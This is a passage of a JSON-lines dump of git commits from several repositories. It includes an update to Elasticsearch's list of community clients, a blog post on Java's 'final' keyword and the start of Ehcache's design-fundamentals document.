ingerwizard\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,njlawton\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,C-Bish\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,winstonewert\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,artnowo\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,bawse\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,artnowo\/elasticsearch,rajanm\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,fernandozhu\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,elasticdog\/elasticsearch,nezirus\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,a2lin\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,a2lin\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,mikemccand\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,vroyer\/elasticassandra,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elassandra,mortonsykes\/elasticsearch,jprante\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,elasticdog\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,bawse\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"= Community Contributed Clients\n\n:client: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/client\n\nBesides the link:\/guide[officially supported Elasticsearch clients], there are\na number of clients that have been contributed by the community for various languages:\n\n* <<b4j>>\n* <<clojure>>\n* <<cold-fusion>>\n* <<erlang>>\n* <<go>>\n* <<groovy>>\n* <<haskell>>\n* <<java>>\n* <<javascript>>\n* <<kotlin>>\n* <<lua>>\n* <<dotnet>>\n* <<ocaml>>\n* <<perl>>\n* <<php>>\n* <<python>>\n* <<r>>\n* <<ruby>>\n* <<scala>>\n* <<smalltalk>>\n* <<vertx>>\n\n[[b4j]]\n== B4J\n* https:\/\/www.b4x.com\/android\/forum\/threads\/server-jelasticsearch-search-and-text-analytics.73335\/\n B4J client based on the official Java REST client.\n\n[[clojure]]\n== Clojure\n\n* http:\/\/github.com\/clojurewerkz\/elastisch[Elastisch]:\n Clojure client.\n\n[[cold-fusion]]\n== Cold Fusion\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/jasonfill\/ColdFusion-ElasticSearch-Client[ColdFusion-Elasticsearch-Client]\n Cold Fusion client for Elasticsearch\n\n[[erlang]]\n== Erlang\n\n* http:\/\/github.com\/tsloughter\/erlastic_search[erlastic_search]:\n Erlang client using HTTP.\n\n* https:\/\/github.com\/dieswaytoofast\/erlasticsearch[erlasticsearch]:\n Erlang client using Thrift.\n\n* https:\/\/github.com\/datahogs\/tirexs[Tirexs]:\n An https:\/\/github.com\/elixir-lang\/elixir[Elixir] based API\/DSL, inspired by\n http:\/\/github.com\/karmi\/tire[Tire]. Ready to use in pure Erlang\n environment.\n\n\n[[go]]\n== Go\n\n* https:\/\/github.com\/mattbaird\/elastigo[elastigo]:\n Go client.\n\n* https:\/\/github.com\/belogik\/goes[goes]:\n Go lib.\n\n* https:\/\/github.com\/olivere\/elastic[elastic]:\n Elasticsearch client for Google Go.\n\n\n[[groovy]]\n== Groovy\n\nSee the {client}\/groovy-api\/current\/index.html[official Elasticsearch Groovy client].\n\n[[haskell]]\n== Haskell\n* https:\/\/github.com\/bitemyapp\/bloodhound[bloodhound]:\n Haskell client and DSL.\n\n\n[[java]]\n== Java\n\nAlso see the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n* [Flummi](https:\/\/github.com\/otto-de\/flummi):\n Java Rest client with comprehensive query DSL API\n* https:\/\/github.com\/searchbox-io\/Jest[Jest]:\n Java Rest client.\n\n[[javascript]]\n== JavaScript\n\nAlso see the {client}\/javascript-api\/current\/index.html[official Elasticsearch JavaScript client].\n\n* https:\/\/github.com\/fullscale\/elastic.js[Elastic.js]:\n A JavaScript implementation of the Elasticsearch Query DSL and Core API.\n\n* https:\/\/github.com\/printercu\/elastics[elastics]: Simple tiny client that just works\n\n* https:\/\/github.com\/roundscope\/ember-data-elasticsearch-kit[ember-data-elasticsearch-kit]:\n An ember-data kit for both pushing and querying objects to Elasticsearch cluster\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/ramv\/node-elastical[node-elastical]:\n Node.js client for the Elasticsearch REST API\n\n[[kotlin]]\n== kotlin\n\n* https:\/\/github.com\/mbuhot\/eskotlin[ES Kotlin]:\n Elasticsearch Query DSL for kotlin based on the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n[[lua]]\n== Lua\n\n* https:\/\/github.com\/DhavalKapil\/elasticsearch-lua[elasticsearch-lua]:\n Lua client for elasticsearch\n\n[[dotnet]]\n== .NET\n\nAlso see the {client}\/net-api\/current\/index.html[official Elasticsearch .NET client].\n\n* https:\/\/github.com\/Yegoroff\/PlainElastic.Net[PlainElastic.Net]:\n .NET client.\n\n[[ocaml]]\n== OCaml\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/tovbinm\/ocaml-elasticsearch[ocaml-elasticsearch]:\n OCaml client for Elasticsearch\n\n[[perl]]\n== Perl\n\nAlso see the {client}\/perl-api\/current\/index.html[official Elasticsearch Perl client].\n\n* https:\/\/metacpan.org\/pod\/Elastijk[Elastijk]: A low level minimal HTTP client.\n\n\n[[php]]\n== PHP\n\nAlso see the {client}\/php-api\/current\/index.html[official Elasticsearch PHP client].\n\n* http:\/\/github.com\/ruflin\/Elastica[Elastica]:\n PHP client.\n\n* http:\/\/github.com\/nervetattoo\/elasticsearch[elasticsearch] PHP client.\n\n* https:\/\/github.com\/madewithlove\/elasticsearcher[elasticsearcher] Agnostic lightweight package on top of the Elasticsearch PHP client. Its main goal is to allow for easier structuring of queries and indices in your application. It does not want to hide or replace functionality of the Elasticsearch PHP client.\n\n[[python]]\n== Python\n\nAlso see the {client}\/python-api\/current\/index.html[official Elasticsearch Python client].\n\n* http:\/\/github.com\/rhec\/pyelasticsearch[pyelasticsearch]:\n Python client.\n\n* https:\/\/github.com\/eriky\/ESClient[ESClient]:\n A lightweight and easy to use Python client for Elasticsearch.\n\n* https:\/\/github.com\/mozilla\/elasticutils\/[elasticutils]:\n A friendly chainable Elasticsearch interface for Python.\n\n* http:\/\/github.com\/aparo\/pyes[pyes]:\n Python client.\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/humangeo\/rawes[rawes]:\n Python low level client.\n\n* http:\/\/intridea.github.io\/surfiki-refine-elasticsearch\/[Surfiki Refine]:\n Python Map-Reduce engine targeting Elasticsearch indices.\n\n[[r]]\n== R\n\n* https:\/\/github.com\/ropensci\/elastic[elastic]:\n A low-level R client for Elasticsearch.\n\n* https:\/\/github.com\/ropensci\/elasticdsl[elasticdsl]:\n A high-level R DSL for Elasticsearch, wrapping the elastic R client.\n \nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/Tomesch\/elasticsearch[elasticsearch]\n R client for Elasticsearch\n\n[[ruby]]\n== Ruby\n\nAlso see the {client}\/ruby-api\/current\/index.html[official Elasticsearch Ruby client].\n\n* https:\/\/github.com\/PoseBiz\/stretcher[stretcher]:\n Ruby client.\n\n* https:\/\/github.com\/printercu\/elastics-rb[elastics]:\n Tiny client with built-in zero-downtime migrations and ActiveRecord integration.\n\n* https:\/\/github.com\/toptal\/chewy[chewy]:\n Chewy is ODM and wrapper for official elasticsearch client\n\n* https:\/\/github.com\/ankane\/searchkick[Searchkick]:\n Intelligent search made easy\n\n* https:\/\/github.com\/artsy\/estella[Estella]:\n Make your Ruby models searchable\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/wireframe\/elastic_searchable\/[elastic_searchable]:\n Ruby client + Rails integration.\n\n* https:\/\/github.com\/ddnexus\/flex[Flex]:\n Ruby Client.\n\n\n\n[[scala]]\n== Scala\n\n* https:\/\/github.com\/sksamuel\/elastic4s[elastic4s]:\n Scala DSL.\n\n* https:\/\/github.com\/scalastuff\/esclient[esclient]:\n Thin Scala client.\n\n* https:\/\/github.com\/gphat\/wabisabi[wabisabi]:\n Asynchronous REST API Scala client.\n\n* https:\/\/github.com\/SumoLogic\/elasticsearch-client[elasticsearch-client]:\n Scala DSL that uses the REST API. Akka and AWS helpers included.\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/bsadeh\/scalastic[scalastic]:\n Scala client.\n\n\n[[smalltalk]]\n== Smalltalk\n\n* https:\/\/github.com\/newapplesho\/elasticsearch-smalltalk[elasticsearch-smalltalk] -\n Pharo Smalltalk client for Elasticsearch\n\n* http:\/\/ss3.gemstone.com\/ss\/Elasticsearch.html[Elasticsearch] -\n Smalltalk client for Elasticsearch\n\n\n[[vertx]]\n== Vert.x\n\n* https:\/\/github.com\/goodow\/realtime-search[realtime-search]:\n Elasticsearch module for Vert.x\n","old_contents":"= Community Contributed Clients\n\n:client: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/client\n\nBesides the link:\/guide[officially supported Elasticsearch clients], there are\na number of clients that have been contributed by the community for various languages:\n\n* <<b4j>>\n* <<clojure>>\n* <<cold-fusion>>\n* <<erlang>>\n* <<go>>\n* <<groovy>>\n* <<haskell>>\n* <<java>>\n* <<javascript>>\n* <<kotlin>>\n* <<lua>>\n* <<dotnet>>\n* <<ocaml>>\n* <<perl>>\n* <<php>>\n* <<python>>\n* <<r>>\n* <<ruby>>\n* <<scala>>\n* <<smalltalk>>\n* <<vertx>>\n\n[[b4j]]\n== B4J\n* https:\/\/www.b4x.com\/android\/forum\/threads\/server-jelasticsearch-search-and-text-analytics.73335\/\n B4J client based on the official Java REST client.\n\n[[clojure]]\n== Clojure\n\n* http:\/\/github.com\/clojurewerkz\/elastisch[Elastisch]:\n Clojure client.\n\n[[cold-fusion]]\n== Cold Fusion\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/jasonfill\/ColdFusion-ElasticSearch-Client[ColdFusion-Elasticsearch-Client]\n Cold Fusion client for Elasticsearch\n\n[[erlang]]\n== Erlang\n\n* http:\/\/github.com\/tsloughter\/erlastic_search[erlastic_search]:\n Erlang client using HTTP.\n\n* https:\/\/github.com\/dieswaytoofast\/erlasticsearch[erlasticsearch]:\n Erlang client using Thrift.\n\n* https:\/\/github.com\/datahogs\/tirexs[Tirexs]:\n An https:\/\/github.com\/elixir-lang\/elixir[Elixir] based API\/DSL, inspired by\n http:\/\/github.com\/karmi\/tire[Tire]. Ready to use in pure Erlang\n environment.\n\n\n[[go]]\n== Go\n\n* https:\/\/github.com\/mattbaird\/elastigo[elastigo]:\n Go client.\n\n* https:\/\/github.com\/belogik\/goes[goes]:\n Go lib.\n\n* https:\/\/github.com\/olivere\/elastic[elastic]:\n Elasticsearch client for Google Go.\n\n\n[[groovy]]\n== Groovy\n\nSee the {client}\/groovy-api\/current\/index.html[official Elasticsearch Groovy client].\n\n[[haskell]]\n== Haskell\n* https:\/\/github.com\/bitemyapp\/bloodhound[bloodhound]:\n Haskell client and DSL.\n\n\n[[java]]\n== Java\n\nAlso see the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n* [Flummi](https:\/\/github.com\/otto-de\/flummi):\n Java Rest client with comprehensive query DSL API\n* https:\/\/github.com\/searchbox-io\/Jest[Jest]:\n Java Rest client.\n\n[[javascript]]\n== JavaScript\n\nAlso see the {client}\/javascript-api\/current\/index.html[official Elasticsearch JavaScript client].\n\n* https:\/\/github.com\/fullscale\/elastic.js[Elastic.js]:\n A JavaScript implementation of the Elasticsearch Query DSL and Core API.\n\n* https:\/\/github.com\/printercu\/elastics[elastics]: Simple tiny client that just works\n\n* https:\/\/github.com\/roundscope\/ember-data-elasticsearch-kit[ember-data-elasticsearch-kit]:\n An ember-data kit for both pushing and querying objects to Elasticsearch cluster\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/ramv\/node-elastical[node-elastical]:\n Node.js client for the Elasticsearch REST API\n\n[[kotlin]]\n== kotlin\n\n* https:\/\/github.com\/mbuhot\/eskotlin[ES Kotlin]:\n Elasticsearch Query DSL for kotlin based on the {client}\/java-api\/current\/index.html[official Elasticsearch Java client].\n\n[[lua]]\n== Lua\n\n* https:\/\/github.com\/DhavalKapil\/elasticsearch-lua[elasticsearch-lua]:\n Lua client for elasticsearch\n\n[[dotnet]]\n== .NET\n\nAlso see the {client}\/net-api\/current\/index.html[official Elasticsearch .NET client].\n\n* https:\/\/github.com\/Yegoroff\/PlainElastic.Net[PlainElastic.Net]:\n .NET client.\n\n[[ocaml]]\n== OCaml\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/tovbinm\/ocaml-elasticsearch[ocaml-elasticsearch]:\n OCaml client for Elasticsearch\n\n[[perl]]\n== Perl\n\nAlso see the {client}\/perl-api\/current\/index.html[official Elasticsearch Perl client].\n\n* https:\/\/metacpan.org\/pod\/Elastijk[Elastijk]: A low level minimal HTTP client.\n\n\n[[php]]\n== PHP\n\nAlso see the {client}\/php-api\/current\/index.html[official Elasticsearch PHP client].\n\n* http:\/\/github.com\/ruflin\/Elastica[Elastica]:\n PHP client.\n\n* http:\/\/github.com\/nervetattoo\/elasticsearch[elasticsearch] PHP client.\n\n* https:\/\/github.com\/madewithlove\/elasticsearcher[elasticsearcher] Agnostic lightweight package on top of the Elasticsearch PHP client. Its main goal is to allow for easier structuring of queries and indices in your application. It does not want to hide or replace functionality of the Elasticsearch PHP client.\n\n[[python]]\n== Python\n\nAlso see the {client}\/python-api\/current\/index.html[official Elasticsearch Python client].\n\n* http:\/\/github.com\/rhec\/pyelasticsearch[pyelasticsearch]:\n Python client.\n\n* https:\/\/github.com\/eriky\/ESClient[ESClient]:\n A lightweight and easy to use Python client for Elasticsearch.\n\n* https:\/\/github.com\/mozilla\/elasticutils\/[elasticutils]:\n A friendly chainable Elasticsearch interface for Python.\n\n* http:\/\/github.com\/aparo\/pyes[pyes]:\n Python client.\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/humangeo\/rawes[rawes]:\n Python low level client.\n\n* http:\/\/intridea.github.io\/surfiki-refine-elasticsearch\/[Surfiki Refine]:\n Python Map-Reduce engine targeting Elasticsearch indices.\n\n[[r]]\n== R\n\n* https:\/\/github.com\/ropensci\/elastic[elastic]:\n A low-level R client for Elasticsearch.\n\n* https:\/\/github.com\/ropensci\/elasticdsl[elasticdsl]:\n A high-level R DSL for Elasticsearch, wrapping the elastic R client.\n \nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/Tomesch\/elasticsearch[elasticsearch]\n R client for Elasticsearch\n\n[[ruby]]\n== Ruby\n\nAlso see the {client}\/ruby-api\/current\/index.html[official Elasticsearch Ruby client].\n\n* https:\/\/github.com\/PoseBiz\/stretcher[stretcher]:\n Ruby client.\n\n* https:\/\/github.com\/printercu\/elastics-rb[elastics]:\n Tiny client with built-in zero-downtime migrations and ActiveRecord integration.\n\n* https:\/\/github.com\/toptal\/chewy[chewy]:\n Chewy is ODM and wrapper for official elasticsearch client\n\n* https:\/\/github.com\/ankane\/searchkick[Searchkick]:\n Intelligent search made easy\n\nThe following projects appear to be abandoned:\n\n* https:\/\/github.com\/wireframe\/elastic_searchable\/[elastic_searchable]:\n Ruby client + Rails integration.\n\n* https:\/\/github.com\/ddnexus\/flex[Flex]:\n Ruby Client.\n\n\n\n[[scala]]\n== Scala\n\n* https:\/\/github.com\/sksamuel\/elastic4s[elastic4s]:\n Scala DSL.\n\n* https:\/\/github.com\/scalastuff\/esclient[esclient]:\n Thin Scala client.\n\n* https:\/\/github.com\/gphat\/wabisabi[wabisabi]:\n Asynchronous REST API Scala client.\n\n* https:\/\/github.com\/SumoLogic\/elasticsearch-client[elasticsearch-client]:\n Scala DSL that uses the REST API. Akka and AWS helpers included.\n\nThe following project appears to be abandoned:\n\n* https:\/\/github.com\/bsadeh\/scalastic[scalastic]:\n Scala client.\n\n\n[[smalltalk]]\n== Smalltalk\n\n* https:\/\/github.com\/newapplesho\/elasticsearch-smalltalk[elasticsearch-smalltalk] -\n Pharo Smalltalk client for Elasticsearch\n\n* http:\/\/ss3.gemstone.com\/ss\/Elasticsearch.html[Elasticsearch] -\n Smalltalk client for Elasticsearch\n\n\n[[vertx]]\n== Vert.x\n\n* https:\/\/github.com\/goodow\/realtime-search[realtime-search]:\n Elasticsearch module for Vert.x\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db66726d24e1228be33849bc3e990ab801f2eb87","subject":"doc\/minor configuration of rpc port","message":"doc\/minor configuration of rpc port\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72ca7d0d2d53adde63182913a6c0b309dae4192a","subject":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","message":"Update 2016-04-19-On-the-Subject-of-Finality.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_file":"_posts\/2016-04-19-On-the-Subject-of-Finality.adoc","new_contents":"= On the Subject of Finality\n:hp-tags: programming, Java, final, immutability\n\nThis is the second installment in the _How to Make Your Java Code Not Suck_ series.\n\n== Fightin' (key)words\n\nWhen debating Java code style, the one issue that has probably gotten me into the greatest number of heated arguments is the appropriate use of the keyword `final`. I am not alone in my views on the subject, but it seems that there are great unwashed masses of developers who have not yet been converted to the *Church of `final`*, and some of them seem to get quite annoyed when they see `final` used in places where it is not absolutely required.\n\nHowever, before I go into detail on what my exact position is on the subject, and why nonbelievers are doomed to burn in Mutability Hell, let's recap what, exactly, `final` means when it appears in Java code.\n\n== Final Overload\n\nFirst of all, any Java programmer worth his or her salt knows that `final` actually has two completely different meanings in Java, depending on where it is used.\n\nThe first, and probably most commonly used, meaning of `final` is as a modifier on declarations variables, fields, and parameters. When applied in front of one of these, it effectively makes the identifier a constant for the duration of his scope. This means that once the identifier is initialized, the value it refers to cannot be changed. Its use is generally mandated when defining constants (especially in conjuction with the `static` keyword), and prior to Java 8, its use was required by the compiler whenever an anonymous class creates a closure around a variable in the enclosing scope. For primitives, the use of `final` effectively makes the variable a true constant (within its scope), but when applied to objects, it only makes the reference constant, but not the object itself, so care must be taken to not confuse the two concepts.\n\nThe second, less commonly used (and probably less well understood), meaning of `final` is as a modifier on classes and methods to restrict inheritance and method overriding. Applying `final` to a class prevents the creation of subclasses that extend it. Applying `final` to a method prevents subclasses from overriding that method.\n\nI am primarily concerned with the first meaning of `final` in this article, though I will touch on the second a bit as well.\n\n== Final Thesis\n\nNow that we have covered the meanings of `final`, we come back to the subject of when it ought to be used.\n\nAfter experimenting with different styles over the course of several years, I have settled upon the strongly held conviction that *`final` should be applied to _all_ fields, parameters, and variables except for cases where the value definitely needs to change over time* (and only after considering the alternatives). The sole exceptions to this rule are constants defined on interfaces, which are implicitly `final` without needing to use the keyword, and parameters of abstract methods, where `final` has no effect.\n\n== Preemptive Strike\n\n","old_contents":"= On the Subject of Finality\n:hp-tags: programming, Java, final, immutability\n\nThis is the second installment in the _How to Make Your Java Code Not Suck_ series.\n\n== Fightin' (key)words\n\nWhen debating Java code style, the one issue that has probably gotten me into the greatest number of heated arguments is the appropriate use of the keyword `final`. I am not alone in my views on the subject, but it seems that there are great unwashed masses of developers who have not yet been converted to the *Church of `final`*, and some of them seem to get quite annoyed when they see `final` used in places where it is not absolutely required.\n\nHowever, before I go into detail on what my exact position is on the subject, and why nonbelievers are doomed to burn in Mutability Hell, let's recap what, exactly, `final` means when it appears in Java code.\n\n== Final Overload\n\nFirst of all, any Java programmer worth his or her salt knows that `final` actually has two completely different meanings in Java, depending on where it is used.\n\nThe first, and probably most commonly used, meaning of `final` is as a modifier on declarations variables, fields, and parameters. When applied in front of one of these, it effectively makes the identifier a constant for the duration of his scope. This means that once the identifier is initialized, the value it refers to cannot be changed. Its use is generally mandated when defining constants (especially in conjuction with the `static` keyword), and prior to Java 8, its use was required by the compiler whenever an anonymous class creates a closure around a variable in the enclosing scope. For primitives, the use of `final` effectively makes the variable a true constant (within its scope), but when applied to objects, it only makes the reference constant, but not the object itself, so care must be taken to not confuse the two concepts.\n\nThe second, less commonly used (and probably less well understood), meaning of `final` is as a modifier on classes and methods to restrict inheritance and method overriding. Applying `final` to a class prevents the creation of subclasses that extend it. Applying `final` to a method prevents subclasses from overriding that method.\n\nI am primarily concerned with the first meaning of `final` in this article, though I will touch on the second a bit as well.\n\n== Final Thesis\n\nNow that we have covered the meanings of `final`, we come back to the subject of when it ought to be used.\n\nAfter experimenting with different styles over the course of several years, I have settled upon the strongly held conviction that *`final` should be applied to _all_ fields, parameters, and variables except for cases where the value definitely needs to change over time* (and only after considering the alternatives). The sole exceptions to this rule are constants defined on interfaces, which are implicitly `final` without needing to use the keyword, and parameters of abstract methods, where `final` has no effect.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7c739c2efd942946a149fc05546e700933093f28","subject":"y2b create post THE $35,000 RACING SIMULATOR","message":"y2b create post THE $35,000 RACING SIMULATOR","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-15-THE-35000-RACING-SIMULATOR.adoc","new_file":"_posts\/2016-10-15-THE-35000-RACING-SIMULATOR.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"2f039426ec7650e739c8c6d043896f98163f6b87","subject":"Add defaults related builder design guideline","message":"Add defaults related builder design guideline\n","repos":"GaryWKeim\/ehcache3,chrisdennis\/ehcache3,aurbroszniowski\/ehcache3,cljohnso\/ehcache3,alexsnaps\/ehcache3,AbfrmBlr\/ehcache3,lorban\/ehcache3,cschanck\/ehcache3,AbfrmBlr\/ehcache3,ljacomet\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,GaryWKeim\/ehcache3,cschanck\/ehcache3,chrisdennis\/ehcache3,ehcache\/ehcache3,rkavanap\/ehcache3,albinsuresh\/ehcache3,rkavanap\/ehcache3,ljacomet\/ehcache3,jhouserizer\/ehcache3,ehcache\/ehcache3,jhouserizer\/ehcache3,lorban\/ehcache3,henri-tremblay\/ehcache3,albinsuresh\/ehcache3","old_file":"design.basics.asciidoc","new_file":"design.basics.asciidoc","new_contents":"= Ehcache Design Fundamentals\n\n:toc:\n\n== `CacheManager`, `Cache` and their dependencies\n\nAs in the 1.x & 2.x line, Ehcache has the notion of a `CacheManager`, who manages `Cache` instances. Managing a `Cache`\nmeans fulfilling a couple of roles:\n\n - Life cycling it: e.g. `.init()`, `.closing()` the `Cache`;\n - Providing it with `Service` instance: A `CacheManager` comes with a set of base abstract services `Cache` can use\n and that it will lifecycle too; but the `CacheManager` can lifecycle any amount of additional `Service` types that\n gets registered with it. These `Service` can then be looked up, e.g. by `Cache` or other `Service` instances, using the\n `ServiceProvider` interface;\n - Finally, the `CacheManager` acts as a repository of alias'ed `Cache` instances. Unlike in the previous versions, `Cache`\n instances aren't named, but are registered with the `CacheManager` under an _alias_. The `Cache` is never aware of this.\n\nThis diagram tries to summarize the different roles:\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/baseTypes.png[Base Types]\n\nA user will only mostly interact with the `CacheManager` and `Cache` API types... He may need to configure specific\n`Service` types for his `Cache` instances to use. See <<configuration-types-and-builders>>\n\n=== The `CacheManager`\n\nWhile the `CacheManager` does act as a repository, it is _not_ possible to add a `Cache` directly to a `CacheManager`.\nA `Cache` can be created by a `CacheManager`, which will then keep a reference to it, alias'ed to a user provided name.\nTo remove that `Cache` from the `CacheManager`, it has to be explicitly removed using `CacheManager.removeCache(String)`.\nUpon that method successfully returning, the `Cache` 's status will be `Status.UNINITIALIZED` and as such will not be\nusable anymore, see <<state-transitions>> section below.\n\n=== The `Cache`\n\nA `Cache` is backed by a `Store` where all cached entries (i.e. key to value mappings) are held. The `Cache` doesn't know\nwhat topology this `Store` is using; whether it's storing these entries on the JVM's heap, off the heap, on disk, on a remote\nJVM or any combination of the above.\n\nWhen a `Cache` is being constructed, e.g. by the `CacheManager` on a `.createCache()` method invoke, the `CacheManager`\nwill lookup a `Store.Provider` which is one of the bundled `Service` types of Ehcache, asking it to create a `Store` based\non the `CacheConfiguration` used to configure the given `Cache`. That indirection, makes both the `Cache` as well as the\n`CacheManager` ignorant of what topology this `Cache` is to use. Ehcache comes with a `DefaultStoreProvider` that will\nbe loaded by the `ServiceProvider`, should none be explicitly provided. That in turn will resolve the required `Store`\ninstance to be provided to the `Cache` being created.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/cacheStore.png[Cache's Store]\n\nThe `Cache` also tries to never _fails_ on operations invoked, e.g. a get shouldn't result in throwing an exception if the\n`Store` that backs it up uses serialization and fails to retrieve the mapping. Instead, Ehcache tries to be resilient and\nwill, by default, try to clear that mapping from its `Store` and return `null` instead to the user. It is the responsibility of the\n`Cache` to handle the exceptions a `Store` may throw (the `Store` interface explicitly declares it throws\n`CacheAccessException`, which is a checked exception). The `Cache` will delegate failures to the `ResilienceStrategy`,\nwhich in turn is responsible for handling the failure.\n\nCurrently, Ehcache only has a single `ResilienceStrategy`, which is supporting single-JVM deployments, and will try to\n_heal_ the `Store` on failure and making the invoking action on a `Cache` a no-op. We'll add more `ResilienceStrategy`\nand will make it pluggable, when we move on to distributed topologies.\n\n=== The new `UserManagedCache`\n\nThe `UserManagedCache` are, as the name implies, managed by the user instead of being managed by a `CacheManager`. While\nthese instances are meant to be lightweight, short-lived ones, nothing prohibits a user from building a distributed\n`UserManagedCache` if so desired.\n\nAs the user manages that instance 